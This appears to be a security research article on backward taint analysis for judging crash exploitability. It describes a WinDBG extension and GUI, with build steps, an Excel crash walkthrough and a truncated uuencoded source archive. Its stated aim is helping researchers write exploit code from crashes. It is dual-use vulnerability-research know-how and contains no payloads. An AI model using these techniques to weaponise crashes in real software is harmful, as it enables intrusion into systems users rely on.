+    0.1 - Keywords
+
+  1 - Introduction
+    1.1 - Paper structure
+
+  2 - Concepts and Additions 
+    2.1 - Taint Analysis
+	2.1.1 - Taint Sources
+	2.1.2 - Intermediate Languages and Tainted Sources
+	2.1.3 - Explosion of watched data
+    2.2 - Backward Taint Analysis
+	2.2.1 - From the crash to the exploit
+
+  3 - Existent solutions and comparisions
+
+  4 - Future and other uses
+
+  5 - Acknowledgements
+
+  6 - References
+
+  7 - Sources 
+
+------[ 0 - Abstract
+
+This article provides a compilation of the state of the art in program
+analysis, a real implementation based on an extension to the Microsoft 
+Debugger for tracing and a GUI application to actually do such 
+analysis and help determine not just if something is exploitable, but
+actually to guide you in such exploitation process.  It uses backward taint
+analysis to map from the crash back to the original data and define what 
+part of the data crashed the application, and how such data was transformed
+during the execution.
+
+It does not discuss how to create a Microsoft Debugger extension, and is not 
+even going to citate anything related to that.  It is all about software 
+exploitation, so I completely ignore other motivations for program analysis 
+(although I know those motivations are really important too).  A deep
+understanding of software exploitation is required in order to really take 
+advantage of such tool.
+
+
+------[ 0.1 - Keywords
+
+Dynamic Analysis, Taint Analysis, Data Flow, Intermediate Language, Reverse 
+Engineering, Software Exploitation.
+
+------[ 1 - Introduction
+
+Program Analysis is a hot topic.  Many people are discussing this subject 
+even more given the amazing numbers of crashes the fuzzers are finding
+nowadays [1] [2].
+
+This article uses program analysis as the way of making a computational
+system reason automatically (or at least with little human assistance)
+about the behavior of a program and draw conclusions that are somehow
+useful.
+
+In a world where thousands of crashes do exist and are easily found in very
+important softwares, the classification of exploitability of such bugs is 
+the first priority.  It is known that it is impossible (or inviable or 
+nobody wants to, or whatever other excuse you find to not fix your 
+software) to fix all the bugs such fuzzers are finding, so, at least, 
+companies want to fix (or exploit) the ones that are exploitables.
+
+The problem is that the only available solution to analyze such crashes are
+provided by Microsoft (named !exploitable or bang exploitable) [3][4] and 
+are not really useful to create actual exploits or to better understand the
+problem, but just to give a static classification (exploitable, probably
+exploitable, not exploitable or unknown).
+
+Even people with source code access are sometimes relying on such tools to 
+determine the exploitability of a given path (sometimes it is easier to 
+analyze a bug without getting into the messy code structure).
+
+Taint Analysis concepts and challenges are going to be explained in order 
+to determine what is being done by the proposed solution and to provide a 
+better idea of future and areas of improvements.
+
+---[ 1.1 - Paper structure
+
+In Chapter 2 I discuss about the concepts needed in the solution, like what
+is program flow analysis, taint analysis, what are the taint sources that 
+can be used and how to map between the assembly code and the taint places 
+in order to propagate the taint.  Also in this chapter I talk about the 
+explosion of watched data when you are tainting from the beginning of the 
+execution and why backward taint analysis is the solution for this problem.
+
+Chapter 3 compares the provided solution with the Microsoft !exploitable 
+software. 
+
+Chapter 4 defines the future of this area and some expected improvements in
+the future.   
+
+Chapter 5 is the acknowledgements to everybody who contributed 
+directly or indirectly to this article.  
+
+Chapter 6 includes the references and some additional references (not 
+directly cited in the article, but very useful to learn more) and, finally,
+Chapter 7 is the most juicy part and includes all the sources for two 
+different projects (the Microsoft Debugger extension which is the main 
+focus of this article and a HeapMonitor for Linux-ARM that I also comment
+in this paper).
+
+------[ 2 - Concepts and Additions
+
+This is the core of the article and will give the state-of-the-art in 
+program analysis focusing in software exploitation.  Here I discuss
+all the challenges in this area and all the concepts needed in order to
+understand the attached code (Section 7).
+
+Vulnerability exploitation experience is not required to understand this
+particular section.  Vulnerability exploitation experience is mandatory
+to actually use the offered solution, since the implementation only helps
+the analysis process and does so automating the process of validation of
+what the attacker control that influences a crash and what are the code
+traces to get to the crash point.
+
+---[ 2.1 - Taint Analysis
+
+Taint Analysis is one kind of program flow analysis and the idea behind 
+such analysis of a program flow in the context of this article is to define
+the influence of external data over the analyzed application.
+
+Since the information flows, or as usually said, is copied to or influences
+other data, there is a need to follow this influence in order to determine
+the control over specific data (registers, memory locations).  This is a
+requirement to later determine the exploitability.
+
+To follow the information flow, I need to keep track over all the taint
+sources, and propagate such tracking to influenced data.
+
+That means that when a tainted location is used in such a way that a value
+of other data is derived from the tainted data (like in mathematical
+operations, move instructions and others) I need to mark the other location
+as tainted as well.  This is called taint propagation and is defined with 
+the following transitive relation:
+
+	- If information A is used to derive information B:
+		A->t(B) -> Direct flow
+	- If B is used to derive information C: 
+		B->t(C) -> Direct flow
+	- Thus: A->t(C) -> Indirect flow
+
+These transitive steps between operations are called 'flows' and can be 
+analyzed one by one or in a block (like in the example above, A->t(C)).  
+
+A location is defined as:
+
+	- A memory address and size
+
+	- A register name (for the implementation a register is considered 
+	  entirely, not making differences regarding %eax and %al for 
+	  example). This means that, when defining a register, I set 
+	  it higher (e.g: setting %al as tainted will also taint %eax) 
+          and clearing will clear it lower.  Care must be taken, since
+	  when defining %al, %ah is not set. 
+
+To keep track over bit operations in a register, it is important to taint 
+the code-block level of a control flow graph [5].  This adds extra 
+complexity, since there is the flow graph and the data flow dependencies 
+graph.  The dependencies graph represents the influence of a source data
+to the operation been performed.
+
+In the implementation provided with this article, the WinDBG extension will
+normalize the operations, saving the used values for later inspection by 
+the GUI application.  This provides a great view over the tainted data.
+
+
+---[ 2.1.1 - Taint Sources
+
+Any information that is considered untrusted is tainted.
+
+Untrusted, for the scope of this article, is the information considered in
+control of the attacker.  There is also a transitive relation when dealing
+with tainted data, where any untainted data that receives values from tainted 
+source, becomes tainted. 
+
+This includes information received from the network, or readed from the 
+disk (in case of client-side exploits, for example).
+
+The more tainted information, the bigger the propagation and the required
+resources in order to keep track of that.  In fuzzing situations, where
+taint data is used to feedback the program behavior, even server-side
+configurations can be marked as tainted (in order to avoid the need to test
+server software with multiple different configurations [22]).
+
+Tainted information is just deleted when it receives an assignment from an
+untainted source or and assignment from a taint source resulting in a constant
+value not controlled by the attacker.  Most instructions in a program will not
+untaint the data, thus usually the number of tainted data grows during the
+program analysis.
+
+The example above is an explicit flow, since the defined value will receive
+the used tainted value independently of any conditions.
+
+When there are conditions for the flow, this is called an implicit flow,
+like in the following example:
+
+	if (x == 1) y=0;
+
+As I'll analyze in section 2.2, conditional statements needs a special analysis
+approach, and in the offered tool this is done in the analysis part 
+(the WinDBG extension). 
+
+Two special situations to track are partial tainting (when the untrusted 
+source doesn't completely control the tainted data) and tainting merge 
+(when there are two different untrusted sources being used to derive some
+data).  In a merge, the result is tainted. 
+
+A data area is 'used' when it is referenced by an operation and is
+'defined' when the data is modified.  
+
+Instructions that are pure assignments are easy to track, since if a 
+tainted location is used to define another location, this new location will
+also be tainted.
+
+Operations over strings are tainted when:
+
+	- They are used to calculate string sizes using a tainted location
+		E.g:  a = strlen(tainted(string));
+
+		Since string is tainted, I assume the attacker also controls
+		the value of a.  
+
+	- Search for some specific char using a tainted location, defining
+	  a flag if found or not found. 
+
+		E.g.:	pointer = strchr(tainted(string), some_char);
+	
+			if (pointer) flag=1;
+
+		Since the string is tainted, I assume the attacker also 
+		partially controls the flag.  The same happens if the
+		attacker controls the some_char value.
+				
+Arithmetical instructions with at least one used tainted data usually 
+define tainted results, since the attacker at least partially controls the 
+result.  
+Those instructions can be simplified using intermediate languages to map to
+boolean operations, and then the following rules applies:
+
+Or truth table:
+ 
+X	Y	X or Y	   
+0	0	0	   
+0	1	1	   
+1	0	1	   
+1	1	1	
+
+
+And truth table:
+ 
+X	Y	X and Y	   
+0	0	0	   
+0	1	0	   
+1	0	0	   
+1	1	1	 
+
+Xor truth table:
+ 
+X	Y	X xor Y	   
+0	0	0	   
+0	1	1	   
+1	0	1	   
+1	1	0	 
+
+Assuming there is at least one used tainted data:
+
+	- In the situation where I have an or operand, if the used 
+	  untainted data is 1, I know that I don't define the result of the
+  	  operation, so I untaint the result.  If it is 0, I know that 
+	  whatever value I define for the tainted data, the same value will
+	  be defined for the used target of the operation, meaning that the
+	  result is tainted.
+
+	- When I have the and operation, on the other side, if the used 
+	  untainted data register is 0, I know that I can't define the 
+	  result, and hence I untaint the data.  If the used untainted data
+	  is 1, I completely define the result, so it is tainted.
+
+	- XORs have a special situation where the value is XORed with 
+	  itself. This is the only case where an used tainted data will 
+	  define an untainted result (0).
+
+It is also a good idea to keep track of the EFLAGS register when the 
+attacker is able to define the value, considering it tainted (this is later
+used to determine the influence over flow operations).
+
+Conditional branches are taken care of in the implementation using the 
+tracing analysis generated by the WinDBG plugin. Single-stepping is used for
+the tracing.  WinDBG provides the disassembled opcode for the current 
+instruction and it is parsed to keep track of the tainted data.
+
+To solve a limitation of the tool, which is to consider cases not created 
+by the original crash data, one must analyze conditional jumps and flag 
+registers carefully:
+
+	- If the attacker can define the EFLAGS, and a jump is dependent of
+	  a flag, the attacker controls the branch decision (this is 
+	  considered by !exploitable as unknown, since creates lots of 
+	  different possibilities - simply controlling EIP is not enough to
+	  define exploitability, since some control over the memory 
+	  location pointed by the EIP is also a requirement).  Ret-into-lib
+	  depends of the controls over the arguments and ROP approaches requires
+	  multiple return control to create all the required gadgets.
+
+	- control over a branch decision means tainted EIP, since the 
+	  attacker at least partially controls the flow of execution
+
+	- To consider the value of EIP, one must define:
+		* The address if the jump is taken
+		* The address of the next instruction (if the jump is not 
+	     	  taken)
+		* The value of the interesting flag register (0 or 1)
+		* Then:  %eip<-(address of the next instruction) +  value 
+		  of the flag register * (|address if the jump is taken - 
+		  address of the next instruction|)
+
+The above formula permits to extend the functionality to expand the taint 
+over code flow blocks, solving the actual limitation of defining if a 
+specific code block is under attacker control (instead of a specific 
+destination with the actual input that generates the crash), but also 
+exponentially grow the complexity of keeping track.  
+
+Researchers are creative and as so there are many other uses for taint
+analysis like identify how long sensitive data is kept in the system [6] 
+and/or formally define a secure information flow [7].
+
+
+---[ 2.1.2 - Intermediate Languages and Tainted Sources
+
+In order to keep track of the tainted sources and propagate the taint, it
+is critical to have a program analysis that will understand the target
+program language semantics.
+
+Tools exist to implement taint analysis in high-level languages, such as
+C++ and Java [7][8][9], but this article focuses on straight assembly code 
+analysis.  I also recommend reading about symbolic execution [9][10] and 
+SAT Solvers [11][12][13] since this has a close relation with the subject.
+
+The classic approach is to use an intermediate language to represent the
+program instructions.  This improves the code quality and helps in
+portability.
+
+There are many good references in that area, so I'm just going to recommend
+some [14][15][16] and say that I use the WinDBG api directly, which is not
+the best approach while thinking in portability, but was the fastest to 
+code. 
+
+The WinDBG extensions are DLLs loaded by the debugger using LoadLibrary and 
+run in the context of the debugger process.  Those extensions are trusted
+by the debugger.  The debugger tries to handle access violations, but heap
+corruptions in the extension itself will likely crash the debugger.
+
+All the debugger extensions can make calls to the Win32 API and to the
+debugger interfaces (dbgeng.dll).
+
+What is more interesting is the fact that the debugger API will try to
+abstract the type/version of the target, which means you can write
+extensions that will work on a live debugging session or in a dump file
+equally.  The same applies for user-mode/kernel-mode targets.
+
+The two main types of extensions API for WinDBG are:
+	- WdbgExts -> Old debugger extension interfaces has many
+limitations for symbol and type lookups 
+	- DbgEng -> It is the new debugger interface, which the attached
+project is based on.  Offers interface for everything that can be performed
+by the debugger
+
+DbgEng extension API is exposed through the dbgeng.dll and offers the
+capability to create new standalone tools that call the interface.  Some of
+the functionalities supported:
+	- Get current thread/process information
+	- Read/Write memory
+	- Symbol/type lookup
+
+To call the extension functions, one need to first created the debug
+interface objects and then call the interface exposed by these objects.
+
+A extension using the DbgEng must export the DebugExtensionInitialize entry
+point, and optionally export the DebugExtensionNotify and
+DebugExtensionUninitialize entry points.
+
+As previously explained, the debugger will LoadLibrary() the extension dll
+and then will use the GetProcAddress() to find the entry point.
+
+From the attached code:
+	HRESULT
+	CALLBACK
+	DebugExtensionInitialize(
+		OUT PULONG Version,
+		OUT PULONG Flags
+	)
+
+This is the mandatory entry point which will be called when the extension
+is loaded.  This function get new debugger interfaces by calling in the
+code:
+	if ((Hr = DebugCreate(__uuidof(IDebugClient)),
+				(void **)&DebugClient)) != S_OK)
+	...
+	
+	if ((Hr = DebugClient->QueryInterface(__uuidof(IDebugControl),
+				(void **)&DebugControl)) != S_OK)
+
+The optional: 
+	void
+	DebugExtensionNotify(
+		OUT ULONG Notify,
+		OUT ULONG64 Argument
+	)
+
+Is called then the target is connected/disconnected and is not used in the
+code.  The DebugExtensionUninitialize is called when the extension is
+unloaded and can perform cleanup routines.
+
+In the attached code:
+	HRESULT
+	CALLBACK
+	vdt_trace(PDEBUG_CLIENT Client, PCSTR args)
+
+Is the debugger extension (called from the debugger using !vdt_trace).  The
+args is the command line argument string passed to the extension.
+
+The API is very rich in getting process information and I strongly
+recommend the reader to have a look into the source code at this point.
+
+
+---[ 2.1.3 - Explosion of Watched Data
+
+Anybody who has worked with taint propagation knows that the biggest 
+problem is how to keep track of all the data.
+
+In this case, I need at least to:
+
+	- Identify all the instructions and their operands
+	- Define what are the source, destination and other impacted
+	  registers (some projects don't keep track of affected registers,
+	  like the comparision flags in EFLAGS [6])
+	- Mark all the tainted data
+	- Understand what each instruction does
+
+It is easy to see that keeping track over all the information is quite
+performance-intensive, even more when decisions need to be made and
+followed.
+
+There are implicit and explicit operands for instructions, and it is
+necessary to support all the situations (otherwise, the track over some 
+important tainted data is lost).
+
+A good example [5] is a simple push %eax operation:
+	
+	- Explicit operand: %eax register
+	- Implicit operands: %esp and ss
+	- Semantic:  %esp<-%esp-4	(substraction)
+		     ss:[%esp]<-%eax	(move)
+
+As explained, this is treated by the intermediate language. I need to keep
+track of the base memory areas, their size and the register names (keeping
+bitwise information - as opposed of byte-level [21] - is better to avoid false
+positives, but is prone to easily explode the amount of data collected).
+
+Boolean operations have a special treatment as well, since some boolean
+operations will provide different results when they are performed with the
+same data (or with fixed values), like a XOR of the same tainted data will
+give back untainted information (and with 0 is the same, and so on...), as 
+explained before.
+
+Instructions over strings also needs to be tainted (many integer overflows 
+happens from calculations of data sizes).  The cases of tainting operations
+over strings have been explained in the section 2.1.1.
+
+Tainted data will remain for long time, also increasing the explosion
+problem (to delete the tracking over a data, it is required that this data
+receives an uncontrolled value, or is deallocated somehow).
+
+During the tracing step (explained later) the instructions complexity are
+simplified in order to speed-up the analysis process. 
+
+Due to all the challenges faced by the taint analysis and to the lack of
+detailed information about source data for specific file-formats and protocols,
+and thus the difficulties in creating working exploits for such cases, I
+decided to use a different approach.  Such approach is very useful when you 
+already have a reproducible crash case and is named Backward Taint Analysis.
+
+---[ 2.2 - Backward Taint Analysis
+
+Backward Taint Analysis is a reverse approach to the natural taint analysis
+flow.  Basically, instead of getting all the input, mark it as tainted and 
+track it during the program execution, what I do is to get the crash,
+validate what is of interest (which led to the application crash) and trace
+back to see if it comes from input and, if so, what modifications were
+performed.
+
+This avoids the explosion of tainted data, since most of the input is
+considered not tainted (and usually it is legitimate).
+
+To do so, the process is divided in two parts:
+
+	- A trace from a good state to the crash (incrementally dumped to a
+	  file) -> Gather substantial information about the target 
+	  application when it receives the input data, which is formally 
+	  named 'analysis'
+	- Analysis of the trace file -> Formally defined as 'verification' 
+	  step, where the conclusive analysis is done
+
+The trace step stores some useful information, like effective addresses and
+data values (later used to determine what is been copied to where and how
+it is been affected). Note that:
+
+	- This is done using a WinDBG extension
+	- It only supports the basic x86 instructions (so, no MMX and SSE).
+	This limits the analysis in many cases and requires extension on
+	the supported instructions.  The project is been open-sourced here,
+	so I expect to receive patches.
+	- Simplification of the instructions to make the next step softer
+
+To provide the simplification it is necessary to deal with many specifics, 
+like in the instruction:
+
+	- CMPXCHG r/m32, r32 -> 'Compare EAX with r/m32. If equal, ZF is 
+	                         set and  r32 is loaded into r/m32. 
+				 Else, clear ZF and load r/m32 into 
+				 AL' [17]
+
+Such an instruction creates the need for conditional taints, since 
+by controlling %eax and r32 the attacker controls r/m32 too.
+
+Alternative taints are also provided, in the form of srcdep{1,2,3}.
+
+Since the trace step generates a file to be loaded by the next step, this
+file will contain:
+
+	- Mnemonic of the instruction
+	- Operands
+	- Dependences for the source operand
+
+Dependences for an operand are for example, elements of an indirectly
+addressed memory.  This will create a tree of the dataflow, with a root in
+the crash instruction.
+
+The analysis step receives the address ranges that have the attacker data 
+and then does the automatic analysis to determine the control over anything
+you want to know.
+
+	- This is done by a standalone tool (it is in the same project
+	  file), and has a GUI!
+
+Since the dataflow is available in a tree rooted in the crash instruction,
+the analysis step will just search in this tree, using a BFS [18]
+algorithm.
+
+Let's now look at some example code:
+
+	1-) mov edi, 0x1234       ; dst=edi, src=0x1234
+	2-) mov eax, [0xABCD]     ; dst=eax, src=ptr 0xABCD
+       	              		  ; Note 0xABCD is evil addr
+	3-) lea ebx, [eax+ecx*8]  ; dst=ebx, src=eax, srcdep1=ecx
+	4-) mov [edi], ebx   	  ; dst=ptr 0x1234, src=ebx
+	5-) mov esi, [edi]   	  ; dst=esi, src=ptr 0x1234, srcdep1=edi
+	6-) mov edx, [esi]   	  ; Crash!!!
+
+The tree will look like:
+
+	6-) Where does [esi] come from?
+	5-) [edi] is moved to esi, where edi comes from and what does exist
+	    in [edi]?
+	4-) [edi] receives ebx and edi is defined in 1-) from a fixed value
+	3-) ebx comes from a lea instruction that uses eax and ecx
+	2-) eax receives a value controlled by the attacker
+	... ecx is out of the scope here :)
+
+
+
+---[ 2.2.1 - From the crash to the exploit
+
+In order to compile the provided project, I use Microsoft Visual Studio 
+2008 for the GUI and the command line for the debugger extension (don't 
+forget to install the debugger extension SDK [19]).
+
+To compile the applications, go to the sources directory and open the 
+Project in Visual Studio.
+
+The GUI is compiled using the project build, the dll is compiled through 
+the command line:
+
+	- Open the DOS prompt
+	- Execute:
+
+	  Cmd.exe /k C:\WinDDK\7600.16385.0\bin\setenv.bat 	\
+	  C:\WinDDK\7600.16385.0\ chk WNET
+
+	- Then go to the directory VDT-Tracer and execute:
+
+		setpaths.cmd
+
+	- On some systems you will need to open the makefile file (just 
+	  open and close):
+
+		edit makefile
+
+	- Then, just compile:
+
+		bcz
+
+	- Copy the library from bin\i386\vdt-tracer.dll
+	  to your WinDBG extensions directory 
+
+
+Attached to the article there is an Excel file for a problem discovered by 
+accident two years ago (the problem was discovered during a Forensic 
+Analysis by a friend of mine, who after recovering an Excel Spreadsheet 
+noticed that Excel was crashing when trying to open it).  
+The name of the file is FIL573.XLS.
+
+The problem was fixed more than a year ago, but it is useful to illustrate
+the steps taken in order to use this project.  As mentioned, I'm not going 
+to discuss the analysis step, but I'll just show how to get the tool to
+work... the rest is up to you!  
+
+First, open excel, and attach to it using WinDBG [Figure 
+WinDBG_Attaching_to_Excel].  Add a breakpoint in the CreateFile [Figure 
+WinDBG_Breakpoint_CreateFile].
+
+Start the tracing process [Figure WinDBG_Trace_VDT].
+
+Open the crash file withing Excel [Figure Opening_Crash_File_Excel].  
+
+Using an hex editor (in my case I used the xvi32) open the file and try to 
+locate a string that you can search in the program's memory, to determine 
+where the file was loaded [Figure Finding_User_Input_in_Memory].
+
+Using the searching capabilities of WinDBG, locate such string in the 
+program's memory [Figure WinDBG_Finding_User_Input_in_Memory].
+
+Open the trace file in the GUI [Figure VDT_Open_Trace_File] and add a taint
+range like in [Figure VDT_Add_Taint_Range] and 
+[Figure VDT_Add_Taint_Range2].
+
+Now everything is ready, and you will have the taint analysis of the 
+instructions you are interested of, related to the range of memory you just
+specified.  
+
+Click with the right button in any instruction [Figure VDT_Check_Taint_Of],
+see the Check Taint Of option [Figure VDT_Check_Taint_Of2].  It is going to
+offer the taint information for all applicable operands 
+[VDT_Check_Taint_Of3].
+
+
+------[ 3 - Existent solutions and comparisions
+
+
+Microsoft Research released the !exploitable [3] extension for Microsoft 
+Debugger and its source code.  This is a great initiative and contributed a
+lot for the growing number of cooperation between researchers and the 
+software industry (since now the vendors can at least classify the 
+exploitability of each reported vulnerability).  Although it fails in many
+cases to classify the exploitability, it provides a good
+extensibility support and is a good start point in this initiative.  
+It is important to note as well that a good aim of the tool is to identify
+unique bugs, eliminating duplicated issues.
+
+A simple example of the problem of such approach is:
+
+_declspec(naked) int main() {
+	_asm {
+		mov eax, 0x41414141
+		call eax
+	}
+}
+
+This is incorrectly classified as EXPLOITABLE because the tool always
+assumes that the attacker has control over all the input operands
+[Figure bangexploitablefp.jpg].
+This is not the case in the example.  The provided solution in
+this article differs from that, since instead of trying to classify the
+exploitability, I try to save researcher time while analyzing
+vulnerabilities and determining exactly that limitation:  Are the input
+operands in control of the attacker?
+
+So, to resume, bang exploitable (!exploitable) objectives are:
+
+	- Classify unique issues (crashs appearing through different code
+	  paths, machines involved in testing, and in multiple different 
+	  test cases)
+	- Quickly prioritize issues (since crashes appear in thousands,
+	  while analysis capabilities are VERY limited)
+	- Grouping the crashes for analysis
+
+And the provided tool objective is:
+
+	- Helping you to create the exploit code :)
+
+Piotr Bania released a paper about an architecture for similar analysis, 
+providing more advanced cases called Spiderpig [20].  The Spiderpig project
+is not available for testing, making it impossible to create a fair comparision.
+In Piotr's paper, he explains the Virtual Code Integration (or Dynamic Binary 
+Rewriting) approach.  Some of the techniques used in the 'intermediate 
+language representation' phases are also adopted in the provided tool, in a 
+different way (there is no intermediate language, but a normalized output 
+of the execution trace).  Spiderpig has ways to solve specific conflicts 
+in partially controlled data, creating what he named a disputable object. 
+In those objects, parent objects are also available for analysis.
+After reviewing the provided algorithms in the article Spiderpig seems to be 
+much more advanced than the provided tool, but as said, is not available.
+
+Taint Check [21] is dependent of DynamicRIO or Valgrind and is an extension
+to provide taint analysis in order to detect overflow conditions in tested 
+software.  It does not help in the exploit-creation phase, neither to 
+determine the actual exploitability of an issue.  It is divided in the 
+taint-seed, taint-tracker and taint-assert, with the purpose of defining 
+original tainted values (values comming from the network for example), 
+track the propagation and alert about security violations respectively.
+Because they provide a solution for security-tests I decided to also 
+include a heap-monitoring example tool with this article.  This tool aims 
+at solving the challenge of heap tests for embedded Linux architectures 
+using ARM (much less advanced then the Valgrind Memcheck plugin,
+altought the only option for ARM as far as the author is aware).
+
+The solution provided here started when I first faced the problem of 
+exploiting a complex client-side vulnerability, involving a very complex 
+(and at that time closed) file format.  It was later expanded when I saw 
+the results of attacking scenarios against Word [1] and started to think 
+how to automate the analysis in order to determine the exploitability.
+
+My initial version was integrated with a fuzzer to provide internal 
+information and feed back the fuzzer in order to have better coverage of
+the critical parts of the software [22]. It was unix based and
+later ported to cover Solaris too, in order to exploit two vulnerabilities 
+released by Secunia [23] in the same software where RISE Security found a 
+vulnerability some months before.
+
+Because a good friend of mine was doing research in the same area, and had
+good experience with the Microsoft Debugger, we decided to integrate our
+implementations and create the final version provided here.  I keep 
+expanding this version since then and using in my work and personal 
+projects.
+
+The biggest difference here is that we provide the backward Taint Analysis 
+in order to help the exploitation process, which means we focus in 
+determining what the attacker controls from the crash back to the input 
+data.
+
+
+------[ 4 - Future and other uses
+
+I can't foresee the future.  I hope that more researchers are going to
+contribute with the project, helping it to grow and achieve maturity.
+
+The code needs immediate support for extended coverage of x86 instructions,
+speed enhancements, introduction of heuristical detection over user input 
+(so you don't need to manually specify the memory ranges to watch).
+
+I'm sure many other uses are possible, and for sure I do expect some 
+extensions to come.
+
+The original idea was based on Valgrind and REX intermediate language.  The
+available version is based on Microsoft Debugger (but really tight to it 
+due to the limited amount of time to create the project).  
+
+A limitation of such approach is the fact that you need the PoC to trace
+the execution until the crash, and then to analyzed it backwards.  If your
+PoC is not taking a specific execution path that gives you control over some
+specific memory areas, the analysis will say you don't control such memory
+areas.  The tool does not try to find other ways to get control over areas
+that you need, it only provides you the information if you control or not
+such areas based on the executed PoC.
+
+There are other areas of interest, like heap viewing [24].  A
+heap view example for linux arm is also available with the article and 
+future versions on Sourceforge [25].
+
+Also, the integration with fuzzers [22]
+is an interesting approach to provide better ways to find security
+vulnerabilities.
+
+
+------[ 5 - Acknowledgments
+A lot of people helped me in the long way for these researches that 
+resulted in something interesting (at least to me) to be published, you all
+know who you are.
+
+The biggest thanks goes to Julio Auto, for helping me with the tools and 
+for having the motivation to go present alone [26] while I was still 
+fighting to get permissions to release everything in my personal name.
+
+Special tks to the Phrack Staff for the great review of the article, giving  
+a lot of important insights about how to better structure it and giving a 
+real value to it.
+
+I'll never ever forget to say thanks to my research team and friends at
+RISE Security (http://www.risesecurity.org) for always keeping me motivated
+studying completely new things.   
+
+Conference organizers who invited me to talk about Software Exploitation, 
+even after many people already talked about the subject they trusted that my 
+talk was not more of the same. 
+
+It's impossible to not say thanks to COSEINC, an amazing place for hackers  
+to work and which provided me lots of motivation to keep my projects going  
+on my free time.
+
+A big thanks goes to Check Point Software Technologies, for paying me to 
+keep doing my hobby ;)
+
+
+------[ 6 - References
+[1] Nagy, Ben. "Finding Microsoft Vulnerabilities by Fuzzing Binary. Files 
+with Ruby - A New Fuzzing Framework"; 
+Syscan 2009
+
+[2] Miller, Charlie. "Babysitting an Army of Monkeys: An analysis of fuzzing 
+4 products with 5 lines of Python"; Cansecwest 2010
+http://securityevaluators.com/files/slides/cmiller_CSW_2010.ppt
+
+[3] Microsoft !exploitable page
+http://msecdbg.codeplex.com
+
+[4] Abouchaev, Adel; Hasse, Damian; Lambert, Scott; Wroblewski, Greg. 
+"Analyze crashes to find security vulnerabilities in your apps"
+
+[5] Barbosa, Edgar. "Taint Analysis"; H2HC 2009
+http://www.h2hc.com.br/repositorio/2009/Edgar.pdf
+
+[6] Chow, Jin. "Understanding data lifetime via whole system emulation";
+Usenix 2004
+
+[7] Denning, Dorothy; Denning, Peter. "Certification of Programs for Secure 
+Information Flow"
+
+[8] Klee Project
+http://keeda.stanford.edu/wiki/klee-install
+
+[9] Godefroid, Patrice; Levin, Michael; Molnar, David. "Automated Whitebox 
+Fuzz Testing"
+http://research.microsoft.com/en-us/projects/atg/ndss2008.pdf
+
+[10] Molnar, David; Wagner, David. "Catchconv: Symbolic execution and  
+run-time type inference for integer conversion errors"
+
+[11] Wille, Andre; Drechsler, Daniel. "Evaluation of SAT like Proof 
+Techniques for Formal Verification of Word Level Circuits
+
+[12] de Moura, Leonardo; Bjorner, Nikolaj. "Z3: An Efficient SMT Solver"
+
+[13] Z3 Project - Microsoft Research
+http://research.microsoft.com/en-us/um/redmond/projects/z3/
+
+[14] ERESI Project
+http://www.eresi-project.org/
+
+[15] Valgrind Project
+http://www.valgrind.org
+
+[16] Porst, Sebastian. "Applications of the Reverse Engineering Language 
+REIL"
+http://www.h2hc.com.br/repositorio/2009/Sebastian.pdf
+
+[17] Intel Manual 
+http://www.intel.com/software/products/documentation/vlin/mergedprojects/analyzer_ec/mergedprojects/reference_olh/mergedProjects/instructions/instruct32_hh/vc42.htm
+
+[18] BFS algorithm
+http://en.wikipedia.org/wiki/Breadth-first_search
+
+[19] Microsoft Debugger SDK
+http://www.microsoft.com/whdc/devtools/debugging/default.mspx
+
+[20] Bania, Piotr.  "Dynamic Data Flow Analysis via Virtual Code 
+Integration (aka The SpiderPig case)"
+http://piotrbania.com/all/spiderpig/pbania-spiderpig2008.pdf
+
+[21] Newsome, James; Song, Dawn. "Dynamic Taint Analysis for Automatic 
+Detection, Analysis, and Signature Generation of Exploits on Commodity
+Software"
+http://valgrind.org/docs/newsome2005.pdf
+
+[22] Branco, Rodrigo. "Letting your fuzzer know about target's internals"
+http://www.troopers10.org
+
+[23] Secunia Advisory SA32473. "Sun Solaris Sadmin Two Vulnerabilities"
+http://secunia.com/advisories/32473/
+
+[24] Core Security Technologies. "Heap Draw / Heap Tracer"
+http://oss.coresecurity.com/projects/heapdraw.html
+
+[25] JFree Project
+http://www.sf.net/projects/jfree
+
+[26] Auto, Julio. "Triaging Bugs with Dynamic
+Dataflow Analysis" .Source Barcelona 2009
+www.julioauto.com/presentations/sourcebcn09_TBwDDA.ppt
+
+
+------[ 7 - Sources [vdt_jfree.tgz]
+
+---------------------------------------------------------------------------
+Attached to the article there is:
+	- VDT Project:  The main project cited in the article, it is a 
+Microsoft Debugger extension and a GUI used to analyze crash files in order 
+to create an exploit code
+	- Jfree project:  It is a Linux-ARM Heap Monitoring System created 
+long ago and also available at [25]
+	- Images directory:  Some screenshots of the program and plugin of 
+the VDT Project.
+
+Further updates will be available in the RISE Security website at:
+	http://www.risesecurity.org
+
+For the author's public key:
+	http://www.kernelhacking.com/rodrigo/docs/public.txt
+
+begin 644 vdt_jfree.tgz
+M'XL(`%8JJDP``^3]=U1371L^")]4$@@A]!8@]-Y[#[U(;P)20N](E2)*Z+T*
+M@DCO("HH*BHBO?<BB(`!I-IH*BKJ\/B\\YOO_=;,FN^/^<WZULS)2LZ^]LY9
+M>Y]]W_NZ[KW/.8E&6)B+F[>'N[.NC[]'J#CP/V.3.-_D967_W<O]NY>0DOEW
+M_^\&2$K*2$O*RLM(_Y,O*2TA)PW@9/^GM.;_:PL/#7,)P>$`C\`0'[?+_\??
+M._^:I^?_'0WZOW?3^&_[ZQH8R<I+B]D:6?Y?6,<_!I:3D?G?M[^<E/Q_["\E
+M)R\C*R\I=6Y_&6EI.0`G\7]A&_X/M_^7VQ\)A0.1XV!5O"($0(*A``'R1PU`
+MXIU[P=VI>("B'QP*:.!1H#Z$'*`&I@':G^(-`*`[I!<$`E425>,AW0`;0`5`
+M-"X5`P`(8,:#X9^[03\`(@?0GS:(4@?'8F(Q1?]\A&-^5UZ#@7K"(<*(2B.`
+ME%1Q]!TP]<;<R4,`PM/\#U]+X*'=!(#3?6$=HD\`00F`&0%P`?L22``-`8@A
+M`.N7"NZ0@#B;2A)`20!:"(`]+0'H.#\"_8Y(Q@XC@,@(@*6FOXL;DQ\`K(-<
+M$`$N(8";A_]E,:]P%R`ZVL/?WP?P@+E",`28L8];R&5BZ&7/,)Q.)!$*!JK-
+M!OD?!"?T@4$N(.)/13H7%I`;"*#R=$]N[/L-6L_`DSD#ZM!_7W_^U\3_608'
+MF`/T[^O/_YKX?V(&V;\[P/P!&#B#_/X#`#`0.?@>$80#@Q<F%H!2,5;,C2($
+M4"DL\OV>!`'L`$!LD"1@'6)&`J@(@*TU`6`D`&$$@.+<SN<`0P`2"<"Y<3//
